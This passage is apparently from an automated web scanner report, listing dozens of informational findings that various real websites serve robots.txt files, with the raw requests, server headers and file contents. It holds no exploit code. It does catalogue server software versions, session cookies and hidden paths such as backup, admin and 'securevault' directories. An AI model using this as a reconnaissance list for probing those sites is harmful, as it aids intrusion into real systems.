
HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:19 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 29 Oct 2009 12:41:47 GMT
ETag: "4826b-1fb-477123c0638c0"
Accept-Ranges: bytes
Content-Length: 507
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# this is a generic robots.txt file that keeps web spiders, robots, etc. away.
# note that entries here are *requests* that a robot stay away - only a
# well-designed robot will honor these requests
...[SNIP]...

27.1192. http://www.novgroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.novgroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.novgroup.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:03:09 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 30 Jun 2010 20:22:55 GMT
ETag: "1500008-a3-1e71e5c0"
Accept-Ranges: bytes
Content-Length: 163
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /olds
Disallow: /images
Disallow: /BACKUP
Disallow: /secure
Disallow: /style
Disallow: /scripts
Allow: /
Disallow: /securevault


27.1193. http://www.novicelove.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.novicelove.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.novicelove.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 02:54:12 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 30 Nov 2010 14:50:16 GMT
ETag: "11bc7-148-496464e841a00"
Accept-Ranges: bytes
Content-Length: 328

User-agent: *
Disallow: /gallery/count*
Disallow: /gallery1/count*
Disallow: /gallery2/count*
Disallow: /gallery3/count*
Disallow: /gallery4/count*
Disallow: /progallery/count*
Disallow: /gallery/gall
...[SNIP]...

27.1194. http://www.nt2099.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nt2099.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nt2099.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 26 Jan 2007 06:00:00 GMT
Accept-Ranges: bytes
Content-Length: 139
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

# robots.txt generated at www.mcanerin.com
User-agent: *
Disallow: /cgi-bin/
Disallow: /J-ENT/shop/learn-any-language-with-ease/checkitout/

27.1195. http://www.ntpapull.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ntpapull.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ntpapull.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:02 GMT
Server: Apache
Last-Modified: Mon, 27 Oct 2008 20:40:13 GMT
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding,User-Agent
X-Powered-By: ASP.NET 2.0
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1196. http://www.nudists-naturists.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nudists-naturists.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nudists-naturists.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:04 GMT
Server: Apache/2.2.11 (Debian) PHP/5.2.9-4 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Last-Modified: Sun, 02 May 2010 08:44:13 GMT
ETag: "d523e1-24-485987b0fd140"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Baiduspider
Disallow: /

27.1197. http://www.nutrition.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrition.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nutrition.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l
Last-Modified: Wed, 03 Feb 2010 23:45:59 GMT
ETag: "14d219-1b-47ebad1fedbc0"
Accept-Ranges: bytes
Content-Length: 27
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=charset=utf-8

User-Agent: *
Allow: /


27.1198. http://www.nutritional-supplement-educational-centre.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutritional-supplement-educational-centre.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nutritional-supplement-educational-centre.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:05 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.nutritional-supplement-educational-centre.com/knU6nRP6.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disal
...[SNIP]...

27.1199. http://www.nuveen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuveen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nuveen.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Set-cookie: SaneID=173.193.214.243-5129359230748; path=/; expires=Wed, 04-May-16 01:41:51 GMT
Date: Wed, 04 May 2011 01:41:51 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 22 May 2008 15:49:06 GMT
ETag: "045955d23bcc81:b54"
Content-Length: 423

User-agent: msrbot
Disallow: /

User-agent: gsa-crawler-from-nuveen-investments
Disallow: /search/
Disallow: /errors/
Disallow:

User-agent: *
Disallow: /search/
Disallow: /newfrontiers/
D
...[SNIP]...

27.1200. http://www.nyfalls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nyfalls.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nyfalls.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:52 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 08 Mar 2011 03:30:11 GMT
ETag: "23540b5-82-49df03acbf6c0"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/plain

# /robots.txt file for http://www.nyfalls.com/
User-agent: *
Disallow: /google/
Disallow: /google/maps/
Disallow: /staff/contest/

27.1201. http://www.nymetroparents.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nymetroparents.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nymetroparents.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:22 GMT
Server: Apache/1.3.42 (Unix) JRun/4.0 PHP/5.3.3 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sun, 15 Jan 2006 21:59:01 GMT
ETag: "17c234a-41-43cac5a5"
Accept-Ranges: bytes
Content-Length: 65
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /board/boardsearch.cfm

27.1202. http://www.nyxcosmetics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nyxcosmetics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nyxcosmetics.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:18 GMT
Server: Apache
Last-Modified: Sat, 12 Feb 2011 01:26:49 GMT
ETag: "1240254-660-49c0bb5696840"
Accept-Ranges: bytes
Content-Length: 1632
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:45:18 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

27.1203. http://www.nzs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nzs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nzs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:17 GMT
Server: Apache/2.2.15 (Unix)
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 420
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /admin/
Disallow: /advertising/resources/
Disallow: /site-review/
Disallow: /whois/
Allow: /

User-agent: dotbot
Disallow: /

User-agent: Yandex
Disallow: /

User-agent: Tasa
...[SNIP]...

27.1204. http://www.oakridger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oakridger.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oakridger.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:11:10 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: HIT from parent3.ghm.zope.net
Age: 809
X-Cache: HIT from cache2.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

27.1205. http://www.oceancity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oceancity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oceancity.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a DAV/2 PHP/5.2.9
Last-Modified: Wed, 06 May 2009 17:11:57 GMT
ETag: "49c05b-4e-469417e253140"
Accept-Ranges: bytes
Content-Length: 78
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 0.5
Disallow: /phpAdsNew
Disallow: /newRentals

27.1206. http://www.ocp.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocp.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ocp.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:52 GMT
Server: Apache
Last-Modified: Fri, 14 Aug 2009 22:30:21 GMT
ETag: "471fcd-77c-4712198f69940"
Accept-Ranges: bytes
Content-Length: 1916
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:19:52 GMT
Vary: Accept-Encoding,User-Agent
X-OCP-Server: web1.ocp.org
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1207. http://www.odyb.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.odyb.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.odyb.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:23 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 16 Aug 2010 07:04:20 GMT
ETag: "11e2c98-4f1-48deb7109f564"
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 05:04:23 GMT
Content-Length: 1265
Age: 0

# This rule means it applies to all user-agents
User-agent: *

# Disallow all directories and files within
Disallow: /cgi-bin/
Disallow: /stats/
Disallow: /dh_
Disallow: /about/legal-notice/
Disallo
...[SNIP]...

27.1208. http://www.oecd.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oecd.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oecd.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Connection: close
Set-Cookie: vgnvisitor=hg80M0001pg000zEjs2XqS83~3; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Date: Wed, 04 May 2011 02:35:22 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 28 Apr 2008 11:35:06 GMT
ETag: "0d1ebe723a9c81:b03"
Content-Length: 112
Set-Cookie: BipCookie=1157759168.20480.0000; path=/

User-agent: *
Disallow: /infobycountry/
Disallow: /findDocument/
Disallow: /login/
Disallow: /documentprint/

27.1209. http://www.oes.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oes.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oes.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:03:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 03 Mar 2010 17:37:09 GMT
ETag: "201c01a-90-480e8ee805b40"
Accept-Ranges: bytes
Content-Length: 144
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /forum/
Disallow: /bb2/
Disallow: /page2/4871~BODHI_TOYS_-_terrible.html

27.1210. http://www.officialares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officialares.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officialares.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 16 Jul 2010 17:52:12 GMT
ETag: "74081b-1b-48b84e0e6ab00"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.1211. http://www.officialsurveygroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officialsurveygroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officialsurveygroup.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
Last-Modified: Fri, 05 Feb 2010 17:43:39 GMT
ETag: "1100175-1a-47eddfddf88c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1212. http://www.officialsurveypanel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officialsurveypanel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.officialsurveypanel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:15 GMT
Server: Apache
Last-Modified: Fri, 14 Sep 2007 14:36:21 GMT
ETag: "cdc60-1a-60e42340"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
P3P: CP="NOI OTC OTP OUR NOR"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

27.1213. http://www.ofwnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ofwnow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ofwnow.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://ofwnow.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1214. http://www.ohloh.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ohloh.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ohloh.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _ohloh_session=bd00004d0c274173af004067374522f9; path=/
Status: 200 OK
X-Powered-By:
ETag: "5a646d713772de7b539826ae4db17761"
X-Runtime: 0.00224
Content-Length: 1417
Cache-Control: max-age=3600
Server: nginx/0.8.54 + Phusion Passenger 3.0.0 (mod_rails/mod_rack)
Expires: Wed, 04 May 2011 02:59:16 GMT
X-Host: sfo-web-5.blackducksoftware.com
Cache-Control: public
Set-Cookie: uid=rB0lN03AsvRSoU1wHQEOAg==; expires=Thu, 03-May-12 01:59:16 GMT; path=/

User-agent: *
Disallow: /accounts/*/near
Disallow: /images/
Disallow: /images
Disallow: /edits/
Disallow: /edits
Disallow: /*/edits
Disallow: /*/edits/*
Disallow: /*/commits/*
Disallow: /*/contributor
...[SNIP]...

27.1215. http://www.okhistory.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okhistory.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.okhistory.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:43 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 06 Dec 2010 15:17:49 GMT
ETag: "2a84a2-128-64172140"
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /calweb/
Disallow: /contacts/
Disallow: /gift/
Disallow: /man/
Disallow: /newsdb/
Disallow: /OHS/
Disallow: /orders/
Disallow: /pubcontacts/
Disallow: /stats/
Disallow: /top/
D
...[SNIP]...

27.1216. http://www.oldbluewebdesigns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oldbluewebdesigns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oldbluewebdesigns.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:37 GMT
Server: Apache
Last-Modified: Sun, 10 Aug 2008 15:08:53 GMT
ETag: "12d52a18-2b-489f0485"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

27.1217. http://www.oldgf.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oldgf.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oldgf.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:14:07 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Mon, 19 Jul 2010 10:48:31 GMT
ETag: "332882f-57-4c442d7f"
Accept-Ranges: bytes
Content-Length: 87
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /porn/
Disallow: /image/
Disallow: /style/

27.1218. http://www.oldtimepottery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oldtimepottery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oldtimepottery.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:27 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 21:12:43 GMT
ETag: "17b458-1f0-49ec83d274099"
Accept-Ranges: bytes
Content-Length: 496
Keep-Alive: timeout=2, max=150
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /COMPS/
Disallow: /docs/
Disallow: /dropshadow/
Disallow: /about/index
Disallow: /about/categorieslist
Disallow: /about/cheatsheet
Disallow: /about/products
...[SNIP]...

27.1219. http://www.oliverstimelesstoys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oliverstimelesstoys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oliverstimelesstoys.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:11:35 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 01 Feb 2011 15:52:03 GMT
ETag: "18ad1aa-48-83790ec0"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /advert_summary.php
Disallow: /images/thumbnails

27.1220. http://www.omniture.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.omniture.com

Response

HTTP/1.0 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Wed, 08 Oct 2008 20:17:00 GMT
ETag: "2728085-162b-9942c700"
Accept-Ranges: bytes
Content-Length: 5675
xserver: www6.dmz
Content-Type: text/plain
Date: Wed, 04 May 2011 03:21:06 GMT
Connection: close

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /img/
Disallow: /js/
Disallow: /custom/
Disallow: /files/

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFin
...[SNIP]...

27.1221. http://www.onet.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onet.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onet.tv

Response

HTTP/1.0 200 OK
Cache-Control: private
Server: AOLserver/3.4.2 SP/1
Expires: Mon, 03 May 2010 19:20:26 GMT
P3P: CP="ALL DSP COR IVD IVA PSD PSA TEL TAI CUS ADM CUR CON SAM OUR IND"
Last-Modified: Wed, 08 Apr 2009 10:53:50 GMT
Date: Tue, 03 May 2011 19:19:18 GMT
Content-Type: text/plain
Content-Length: 26
X-Cache: HIT from sq2.m3r2.onet
X-Cache-Lookup: HIT from sq2.m3r2.onet:80
Via: 1.0 sq2.m3r2.onet:80 (squid)
Connection: close

User-agent: *
Disallow:

27.1222. http://www.onetouchdiabetes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onetouchdiabetes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onetouchdiabetes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:34 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 11:30:10 GMT
ETag: "11418b7-83c-48791b693f480"
Accept-Ranges: bytes
Content-Length: 2108
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.1223. http://www.onlinealist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinealist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinealist.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:03 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 19 Nov 2008 13:08:58 GMT
ETag: "21ea8076-3d-45c0a83d44e80"
Accept-Ranges: bytes
Content-Length: 61
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /siteadmin/
Disallow: /dev/
Allow: /

27.1224. http://www.onlinecityguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinecityguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinecityguide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:55 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.8 mod_jk/1.2.25 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Mon, 20 Mar 2006 15:31:51 GMT
ETag: "436e8f0-633-441ecae7"
Accept-Ranges: bytes
Content-Length: 1587
Connection: close
Content-Type: text/plain

# robots.txt for Onlinecityguide.com

User-agent: *
Disallow: admin/

User-agent: *
Disallow: admin/assets/

User-agent: *
Disallow: admin/create/

User-agent: *
Disallow: admin/edit/

User-agent: *
D
...[SNIP]...

27.1225. http://www.onlinepublicrecordssearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinepublicrecordssearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinepublicrecordssearch.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:55:18 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:7"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.1226. http://www.onlinesentinel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinesentinel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinesentinel.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 06:55:51 GMT
X-Server-Name: sj-c14-r8-u22-b9
Content-Type: text/plain;charset=utf-8
Date: Wed, 04 May 2011 03:06:03 GMT
Content-Length: 81
Connection: close
Set-Cookie: click_mobile=0
X-N: S

User-agent: *
Disallow: /search
Disallow: /searchresults
Disallow: /holding

27.1227. http://www.onlinezipcodemaps.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinezipcodemaps.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinezipcodemaps.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Content-Length: 67
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Crawl-delay:20
Disallow: /click.php
Disallow: /ud.php

27.1228. http://www.onspring.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onspring.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onspring.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=691200
Content-Type: text/plain
Last-Modified: Fri, 18 Mar 2011 00:06:16 GMT
Accept-Ranges: bytes
ETag: "8128ca4c0e5cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:58:35 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


27.1229. http://www.opusdei.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
